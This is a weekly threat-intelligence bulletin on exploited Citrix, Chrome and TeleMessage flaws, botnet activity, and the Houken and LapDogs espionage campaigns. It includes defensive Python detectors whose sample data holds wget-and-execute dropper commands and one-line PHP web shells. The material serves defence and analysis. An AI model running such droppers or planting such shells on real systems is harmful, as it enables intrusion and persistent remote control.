Executive Summary
This week in cybersecurity, several critical vulnerabilities and active threats underscored the evolving risk landscape. Four new vulnerabilities were added to the CISA KEV catalog, including two in the TeleMessage TM SGNL messaging app, notably used by a former U.S. National Security Advisor, raising alarms over the security of sensitive communications. Vulnerabilities in Google Chrome and Citrix NetScaler were also included. Meanwhile, ReliaQuest reported with medium confidence that a second Citrix NetScaler flaw, CVE-2025-5777 ("Citrix Bleed 2"), is also being exploited in the wild, though Citrix has not yet confirmed that activity.
Simultaneously, botnet-driven exploitation campaigns intensified, with malware families such as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st targeting unpatched systems on platforms like GitLab, Cloud Gateway, and PHP-based services. IoT botnets, including Bashlite, BrickerBot, Tsunami, and Mirai, also ramped up attacks on Eir D1000 modems, rapidly infecting exposed internet-facing devices.
This week saw the emergence of two major cyber-espionage campaigns. "LapDogs", uncovered by SecurityScorecard, used the ShortLeash backdoor to compromise over 1,000 SOHO devices across the U.S. and Asia via long-patched vulnerabilities. Meanwhile, France’s ANSSI reported a campaign by the Chinese-linked group “Houken”, exploiting Ivanti CSA zero-days to target sectors like government, finance, and telecom.
Trending / Critical Vulnerabilities
The vulnerabilities trending this week offer insight into the latest emerging and widely discussed threats, helping defenders prioritize patching and make informed decisions.
CVE-2025-5777
An Insufficient Input Validation Vulnerability in Citrix NetScaler ADC and NetScaler Gateway has raised critical security concerns, earning a CVSS score of 9.3. The flaw, now commonly referred to as "Citrix Bleed 2", stems from improper handling of user input that leads to a memory overread, which could allow threat actors to read sensitive data from appliance memory and use it to gain unauthorized access. Citrix has released updated builds to address the issue across all affected versions, but ReliaQuest has reported with medium confidence that the vulnerability is already being exploited in active attacks, particularly as an initial access vector into enterprise networks. Organizations are strongly urged to apply the latest patches immediately to reduce the risk of compromise. Because leaked memory may contain valid session material, Citrix also recommends terminating all active ICA and PCoIP sessions after upgrading so that any session tokens captured before the patch cannot be reused.
CVE-2025-6543
A Buffer Overflow Vulnerability in Citrix NetScaler ADC and NetScaler Gateway is being actively exploited in the wild. Assigned a critical CVSS score of 9.2, the flaw could lead to denial of service or unintended control flow. Citrix has observed attacks on unpatched appliances, though technical details remain undisclosed. Successful exploitation requires the appliance to be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, or RDP Proxy) or as an AAA virtual server. The vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, and Citrix has released urgent patches, urging organizations to update immediately.
CVE-2025-6554
A Type Confusion Vulnerability in the V8 JavaScript engine of Google Chrome enables remote attackers to perform arbitrary read and write operations via a specially crafted HTML page. Assigned a high CVSS score of 8.8, this flaw affects Chrome versions prior to 138.0.7204.96 and may also impact other Chromium-based browsers such as Microsoft Edge and Opera. Google has issued patches for Windows (138.0.7204.96/.97), macOS (138.0.7204.92/.93), and Linux (138.0.7204.96), with updates being rolled out gradually. As the vulnerability is under active exploitation, it has also been added to the CISA KEV catalog, reinforcing the urgency of applying the updates.
CVE-2025-48927
An Initialization of Resource with an Insecure Default Vulnerability has been identified in the TeleMessage TM SGNL application, stemming from the exposure of a heap dump endpoint via the /heapdump URI due to insecure Spring Boot Actuator configurations. This flaw enables unauthorized access to in-memory data, potentially exposing sensitive information such as session tokens, authentication credentials, and other confidential artifacts. CISA has added this flaw to its Known Exploited Vulnerabilities (KEV) catalog and strongly urges organizations to apply vendor-provided mitigations immediately. If no adequate mitigations are available, CISA further recommends discontinuing use of the affected product to prevent potential compromise.
CVE-2025-48928
An Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability has been discovered in the TeleMessage TM SGNL application. The flaw arises from a JSP-based implementation where the heap content, acting similarly to a core dump, may unintentionally expose sensitive information such as passwords previously transmitted over HTTP. Recognizing the severity of this issue, CISA has added this vulnerability to its KEV catalog. Organizations are strongly advised to apply vendor-recommended mitigations immediately. In the absence of effective mitigations, CISA recommends discontinuing the use of the affected product to avoid potential security breaches.
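Both TeleMessage issues above come down to JVM heap contents reachable over HTTP. The following is an added example, not code from the original page or from TeleMessage or the Spring project: it runs a heapdump-probe detection over constructed web-server access-log lines (a 200 with a multi-megabyte body means the heap actually left the server, anything else was a probe) and audits a Spring Boot `application.properties` fragment for the weak Actuator exposure setting beside its hardened form. The log lines, IP addresses and property values are constructed; the assumption that both `/heapdump` and `/actuator/heapdump` are worth watching, and the default exposure value of `health`, are the author's, not the page's.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Spring Boot Actuator serves the heap at /actuator/heapdump by default; the
# bare /heapdump form is the old Spring Boot 1.x location. Watching both is an
# assumption of this example, not something the advisory states.
HEAPDUMP_PATHS = re.compile(r"^/(actuator/)?heapdump(\?.*)?$", re.IGNORECASE)

# Apache/nginx "combined" access-log layout.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed sample log lines (RFC 5737 addresses), not real telemetry.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jul/2025:10:14:02 +0000] "GET /actuator/health HTTP/1.1" 200 15
203.0.113.10 - - [01/Jul/2025:10:14:05 +0000] "GET /actuator/heapdump HTTP/1.1" 200 73400320
198.51.100.7 - - [01/Jul/2025:10:20:11 +0000] "GET /heapdump HTTP/1.1" 404 196
198.51.100.7 - - [01/Jul/2025:10:20:12 +0000] "GET /heapdump?x=1 HTTP/1.1" 401 0
192.0.2.44 - - [01/Jul/2025:11:02:40 +0000] "POST /api/messages HTTP/1.1" 200 512
"""


@dataclass
class Finding:
    ip: str
    path: str
    status: int
    nbytes: int
    verdict: str  # "dump_served" or "probe"


def scan_access_log(text: str, min_dump_bytes: int = 1_000_000) -> list[Finding]:
    """Flag every request for a heapdump endpoint.

    A JVM heap dump is tens of megabytes at minimum, so a 200 with a body at
    least min_dump_bytes long is treated as a successful exfiltration; any
    other status (401/403/404) is a probe the server correctly refused.
    """
    findings: list[Finding] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not HEAPDUMP_PATHS.match(m["path"]):
            continue
        status = int(m["status"])
        nbytes = 0 if m["bytes"] == "-" else int(m["bytes"])
        verdict = "dump_served" if status == 200 and nbytes >= min_dump_bytes else "probe"
        findings.append(Finding(m["ip"], m["path"], status, nbytes, verdict))
    return findings


def actuator_exposes_heapdump(properties: str) -> bool:
    """True if a Spring Boot properties fragment leaves heapdump reachable over HTTP.

    Exposure requires the endpoint to be enabled AND included in the web
    exposure list (explicitly or via '*') AND not excluded. The default
    include value of 'health' is an assumption matching current Spring Boot.
    """
    props: dict[str, str] = {}
    for line in properties.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    include = {p.strip() for p in props.get("management.endpoints.web.exposure.include", "health").split(",")}
    exclude = {p.strip() for p in props.get("management.endpoints.web.exposure.exclude", "").split(",") if p.strip()}
    enabled = props.get("management.endpoint.heapdump.enabled", "true").lower() == "true"
    exposed = ("*" in include or "heapdump" in include) and "heapdump" not in exclude
    return enabled and exposed


# The weak setting (everything exposed, which is how /heapdump ends up public)
# beside the hardened one (only health/info exposed, heapdump disabled outright).
WEAK_CONFIG = "management.endpoints.web.exposure.include=*\n"
HARDENED_CONFIG = (
    "management.endpoints.web.exposure.include=health,info\n"
    "management.endpoint.heapdump.enabled=false\n"
)

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
    print("weak config exposes heapdump:", actuator_exposes_heapdump(WEAK_CONFIG))
    print("hardened config exposes heapdump:", actuator_exposes_heapdump(HARDENED_CONFIG))
```

Run against real logs, a `dump_served` hit is an incident, not a finding: treat every session token and credential that was in memory at that moment as compromised, which is why CISA's guidance is to apply the vendor mitigation or stop using the product rather than merely block the path.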
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section lists vulnerabilities identified as being exploited by botnets, including recent CVEs logged in MISP. We present the top 5 CVEs whose payloads are suggestive of botnet activity, such as fetching a second stage with wget from a bare IP address.
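The "wget with an IP address" tell mentioned above is easy to turn into a triage rule. The following is an added example, not code from the original page or from Loginsoft's sensor platform: it decodes captured request payloads, extracts any downloader that reaches a bare IPv4 literal, and only calls a payload botnet-like when that download is followed by a chmod or execute step, so a lone `wget` of a text file from an IP does not trip it. The payloads and IP addresses are constructed; the choice of stage markers (drop to a writable directory, chmod, execute, cleanup) is this example's assumption about Mirai-style droppers rather than anything the page specifies.

```python
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"

# wget/curl fetching from a bare IPv4 literal (no DNS) - the botnet tell.
# The URL stops at whitespace or a shell separator so "x86;" is not swallowed.
DOWNLOADER = re.compile(
    rf"\b(?P<tool>wget|curl)\b[^;&|\n]*?"
    rf"(?P<url>(?:https?|ftp)://(?P<ip>{IPV4})(?::\d+)?/[^\s;&|'\"]*)",
    re.IGNORECASE,
)

# Typical dropper stages (assumed markers, not a page-provided list).
STAGES = {
    "drop_to_tmp": re.compile(r"\bcd\s+/(?:tmp|var/run|dev/shm|mnt)\b"),
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    "execute": re.compile(r"(?:^|[;&|]\s*)(?:\./\S+|sh\s+\S+|bash\s+\S+)"),
    "cleanup": re.compile(r"\brm\s+-r?f\b"),
}

# Constructed sample payloads as a sensor might capture them (RFC 5737 addresses).
SAMPLES = [
    "cd /tmp; wget http://198.51.100.23/bins/mips -O mips; chmod 777 mips; ./mips eir.d1000; rm -rf mips",
    "cd%20%2Ftmp%3B%20curl%20-O%20http%3A%2F%2F203.0.113.77%3A8080%2Fx86%3B%20chmod%20%2Bx%20x86%3B%20.%2Fx86",
    "wget https://downloads.example.org/patch-1.2.tar.gz",
    "wget http://192.0.2.9/readme.txt",
]


@dataclass
class Verdict:
    decoded: str
    drops: list[tuple[str, str, str]]  # (tool, url, ip)
    stages: list[str]
    botnet_like: bool


def classify_payload(raw: str) -> Verdict:
    """URL-decode a captured payload and decide whether it looks like a botnet dropper."""
    decoded = unquote(raw)
    drops = [(m["tool"].lower(), m["url"], m["ip"]) for m in DOWNLOADER.finditer(decoded)]
    stages = [name for name, rx in STAGES.items() if rx.search(decoded)]
    # A download from a bare IP alone is suspicious but not conclusive; require
    # evidence the fetched file is made executable or run in the same payload.
    botnet_like = bool(drops) and ("make_executable" in stages or "execute" in stages)
    return Verdict(decoded, drops, stages, botnet_like)


def dropper_hosts(payloads: list[str]) -> Counter:
    """Count distribution hosts across botnet-like payloads (feeds a block list)."""
    hosts: Counter = Counter()
    for raw in payloads:
        v = classify_payload(raw)
        if v.botnet_like:
            hosts.update(ip for _, _, ip in v.drops)
    return hosts


if __name__ == "__main__":
    for raw in SAMPLES:
        v = classify_payload(raw)
        print(f"{v.botnet_like!s:5}  stages={v.stages}  drops={v.drops}")
    print("dropper hosts:", dropper_hosts(SAMPLES))
```

The extracted `(tool, url, ip)` tuples are what you would pivot on: the same distribution host typically serves binaries for several architectures, and the same host recurring across different CVEs on the sensors is how one botnet family gets tied to several of the exploited vulnerabilities.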
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Chinese threat actor "Houken" exploits Ivanti zero-days
The French Cybersecurity Agency (ANSSI) has disclosed a targeted cyber espionage campaign impacting multiple sectors in France, including government, telecommunications, media, finance and transport. The campaign, first detected in September 2024, is attributed to a Chinese threat actor identified as Houken, which exhibits operational and tooling overlaps with UNC5174, previously tracked by Google Mandiant. This campaign stands out for its exploitation of zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices to compromise critical infrastructure and harvest sensitive credentials.
The attackers weaponize CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190 to gain initial access and then establish long-term persistence through three observed methods: the direct deployment of PHP web shells, the modification of existing PHP scripts to inject web shell functionality, and the installation of a malicious kernel module functioning as a rootkit. The use of multiple persistence techniques and the chaining of then-unpatched vulnerabilities underscore the sophistication of the Houken intrusion set and its alignment with advanced Chinese cyber operations.
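Two of the three persistence methods described above leave a footprint in PHP source: a dropped web shell, or a few lines appended to a script that was already there. The following is an added example, not code from the original page, from ANSSI, or from Ivanti: a hunt script that scans a set of PHP files for the pattern a web shell cannot avoid, a code or command execution sink fed directly from a request superglobal, and separately flags decoder-wrapped `eval` and error-suppressed sinks. The four files are constructed (the "modified existing script" case is an ordinary page with an appended one-liner); the rule names and the sink and decoder lists are this example's choices. The kernel-module rootkit is the one method this source-level check does not cover.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Code/command execution sinks a web shell ultimately needs; the optional "@"
# captures PHP's error-suppression prefix, a common web-shell habit.
SINK = re.compile(
    r"(?P<suppress>@?)\b(?P<fn>eval|assert|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*\("
)
# Attacker-controlled input sources.
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b")
# Decoders used to hide the payload handed to eval()/assert().
DECODER = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(")

# Constructed PHP sources, not files from any real appliance.
SAMPLES = {
    # Legitimate: reads a superglobal but only passes it to a prepared statement.
    "login.php": (
        "<?php\nrequire 'db.php';\n$u = $_POST['user'];\n"
        "$stmt = $pdo->prepare('SELECT * FROM users WHERE name = ?');\n$stmt->execute([$u]);\n"
    ),
    # Existing script with a one-line web shell appended (the "modify existing PHP" method).
    "index.php": "<?php\necho 'portal';\n// original content ends here (constructed)\n@eval($_POST['cmd']);\n",
    # Dropped shell with the payload hidden behind base64.
    "cache.php": "<?php eval(base64_decode($_REQUEST['x'])); ?>",
    # Dropped shell executing OS commands straight from the query string.
    "sh.php": "<?php if(isset($_GET['c'])){ system($_GET['c']); } ?>",
}


@dataclass
class Finding:
    path: str
    lineno: int
    rule: str
    line: str


def scan_php_source(path: str, source: str) -> list[Finding]:
    """Line-oriented triage: a sink on the same line as request input is the core rule."""
    findings: list[Finding] = []
    for n, line in enumerate(source.splitlines(), 1):
        m = SINK.search(line)
        if not m:
            continue
        if SUPERGLOBAL.search(line):
            findings.append(Finding(path, n, "sink_fed_by_request", line.strip()))
        if m["fn"] in ("eval", "assert") and DECODER.search(line):
            findings.append(Finding(path, n, "obfuscated_eval", line.strip()))
        if m["suppress"]:
            findings.append(Finding(path, n, "error_suppressed_sink", line.strip()))
    return findings


def scan_tree(files: dict[str, str]) -> dict[str, list[Finding]]:
    """Map each file with at least one finding to its findings."""
    return {p: f for p, s in files.items() if (f := scan_php_source(p, s))}


if __name__ == "__main__":
    for path, findings in scan_tree(SAMPLES).items():
        for f in findings:
            print(f"{path}:{f.lineno} [{f.rule}] {f.line}")
```

Treat hits as triage, not verdicts: administration consoles legitimately call `exec()` in places, so the prompt for an analyst is a sink-from-request line in a file whose modification time or hash no longer matches the vendor package, which is exactly the signature of a modified-in-place script.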
LapDogs Espionage Campaign
Security researchers from SecurityScorecard have uncovered a sophisticated cyber-espionage campaign dubbed LapDogs, which leverages a covert network of over 1,000 compromised SOHO devices, including routers, NAS systems, and IP cameras, across the United States, Southeast Asia, Japan, South Korea, Hong Kong and Taiwan.
The attackers deployed a custom backdoor known as “ShortLeash” delivered via malicious shell scripts and exploitation of known, long-patched vulnerabilities, including CVE-2017-17663 and CVE-2015-1548. These vulnerabilities were used to gain initial access to Linux-based SOHO infrastructure, although variants targeting Windows systems have also been observed. The tactics, techniques, and procedures (TTPs) used in the operation closely align with activity attributed to Chinese nation-state threat actors, particularly the group tracked as UAT-5918. However, it remains unclear whether this group is directly operating the campaign or simply leveraging access provided by others.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/07/02/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/06/30/cisa-adds-one-known-exploited-vulnerability-catalog
- https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_30.html
- https://securityscorecard.com/wp-content/uploads/2025/06/LapDogs-STRIKE-Report-June-2025.pdf
- https://reliaquest.com/blog/threat-spotlight-citrix-bleed-2-vulnerability-in-netscaler-adc-gateway-devices/
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-009/